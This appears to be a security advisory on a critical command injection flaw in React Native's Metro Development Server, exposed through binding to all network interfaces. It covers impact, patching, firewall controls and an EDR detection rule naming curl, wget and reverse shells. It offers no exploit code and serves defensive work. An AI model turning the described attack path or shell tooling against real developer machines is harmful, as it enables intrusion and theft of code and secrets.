A critical vulnerability has been identified in The Metro Development Server, a tool commonly used in React Native development environments. This flaw allows an attacker on the same network to execute arbitrary commands on a developer's machine, leading to a complete system compromise. Due to the high severity and ease of exploitation, this vulnerability poses a significant risk of intellectual property theft, malware infection, and further intrusion into the corporate network.

The Metro Development Server, often initiated by the React Native Community CLI during development, incorrectly binds to all network interfaces (0.0.0.0) by default. This exposes the server to the local network. The server contains an endpoint that does not properly sanitize user-supplied input, creating an OS command injection vulnerability. An unauthenticated attacker on the same network can send a specially crafted HTTP request to this endpoint to execute arbitrary commands on the host operating system with the privileges of the user running the development server.

This vulnerability is rated as critical severity with a CVSS score of 9.8. Successful exploitation could lead to a complete compromise of developer workstations, which are high-value targets. The potential consequences include theft of sensitive source code, API keys, and other intellectual property; installation of ransomware or spyware; and using the compromised machine as a beachhead to launch further attacks against the internal network. The direct impact on development productivity and the indirect impact on corporate security are severe.

Immediate Action: Immediately apply security updates by upgrading The Metro Development Multiple Products to the latest patched version as recommended by the vendor. After patching, review server and system access logs for any signs of compromise or suspicious activity originating from other devices on the local network.

Proactive Monitoring: Monitor network traffic for connections to the Metro server port (typically 8081) from any IP address other than localhost (127.0.0.1). On host systems, monitor for unexpected child processes being spawned by the Node.js process associated with the Metro server. Implement endpoint detection and response (EDR) rules to alert on suspicious command-line executions (e.g., curl, wget, reverse shells) originating from development tools.

Compensating Controls: If immediate patching is not feasible, implement the following controls:

• Configure host-based firewalls on developer machines to block all incoming connections to the Metro server port from external interfaces, allowing access only from localhost.
• Enforce a policy prohibiting developers from running the development server while connected to untrusted networks, such as public Wi-Fi.
• If network access is required, explicitly configure the server to bind only to the localhost interface.

Public Exploit Available: true

Given the critical CVSS score of 9.8 and the public availability of exploit code, this vulnerability represents an immediate and severe threat to the organization. The risk of a full developer machine compromise is high. We strongly recommend that all teams utilizing The Metro Development Server apply the necessary patches with the highest priority. Although this vulnerability is not currently listed on the CISA KEV list, its severity warrants immediate action.